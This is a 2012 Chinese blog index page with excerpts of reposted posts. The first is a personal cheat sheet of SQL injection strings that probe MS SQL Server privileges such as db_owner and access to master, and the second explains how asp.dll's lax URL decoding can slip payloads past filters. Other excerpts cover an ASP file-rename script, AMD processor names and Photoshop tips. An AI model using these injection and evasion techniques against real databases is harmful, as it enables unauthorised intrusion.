作者:admin 发布于:2012-8-18 9:46 Saturday
分类:网络转载
18Aug
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as va...
阅读全文>>
评论(0)
引用(29)
浏览(20313)
作者:admin 发布于:2012-8-18 9:33 Saturday
分类:网络转载
18Aug
先来说URL编码,%加两位的16进制表示一个字符,比如’经过编码之后就是%27,这是人人都知道的URL编码规则,UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想。
然而,我们何必如此听话,试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace,
写
个小程序试一下,abc%hh经过译码还是abc%hh;再看asp.dll是怎么译码的,在asp页面中写入
response.Write(request.QueryString("str")),然后用?str=abc%hh访问它,页面显示
abchh,它直接把%给去掉了。
...
阅读全文>>
评论(0)
引用(61)
浏览(20023)
作者:admin 发布于:2012-8-17 8:28 Friday
分类:网络转载
17Aug
<%
'http://www.rabbit8.cn
Set fs = Server.CreateObject("Scripting.FileSystemObject")
SFile = Server.MapPath("HSH.mdb")
NFile = Server.MapPath("HSH.mdb.rar")
on Error Resume Next
fs.MoveFile SFile, NFile
If Err.Number = 53 Then
Response.Write File & "文件不存在!"
Response.End
Elseif Err.Number = 58 Then
Response.Write File &...
阅读全文>>
标签: asp重命名
评论(0)
引用(78)
浏览(27060)
作者:admin 发布于:2012-8-15 10:15 Wednesday
分类:网络转载
15Aug
羿龙(Phenom)是AMD最新也是最好的处理器系列,基于包括羿龙三核和羿龙四核,不久还会有双核产品
速龙(Athlon)是AMD的中端主流系列,比羿龙档次低些,支持64位技术,有双核和单核
皓龙(Opteron)是AMD的服务器和工作站CPU,一般台式机见不到
炫龙(Turion)是AMD主流笔记本移动处理器系列
镭龙(Radeon)是AMD-ATi的显卡系列
阅读全文>>
评论(0)
引用(110)
浏览(42262)
作者:admin 发布于:2012-8-11 8:28 Saturday
分类:网络转载
11Aug
1、使用仿制图章工具去除文字。
这是比较常用的方法。具体的操作是,选取仿制图章工具,按住 Alt键,在无文字区域点击相似的色彩或图案采样,
然后在文字 区域拖动鼠标复制以复盖文字。 要注意的是,采样点即为复制的起始点。
选择不同的笔刷直径会影响绘制的范围,而不同的笔刷 硬度会影响绘制区域的边缘融合效果。

2、使用修补工具去除文字。
如果图片的背景色彩或图案比较一致,使用修补工具就比较方便。具体的操作是,选取修补工具,
在公共栏中选择修补项为“源”,关闭 “透明”选项。然后用修补工具框选文字,拖动到无文字区域中色彩
或图案相似的位置,松开鼠标就完成复制。修补工具具有自动匹配颜 色的功能,复制出的效果与周围的色彩较为融合,
这是仿制图章工具 所不具备的。

3,使用修复画笔工具去除文字。
操作的方法与仿制图章...
阅读全文>>
标签: ps
评论(0)
引用(425)
浏览(30625)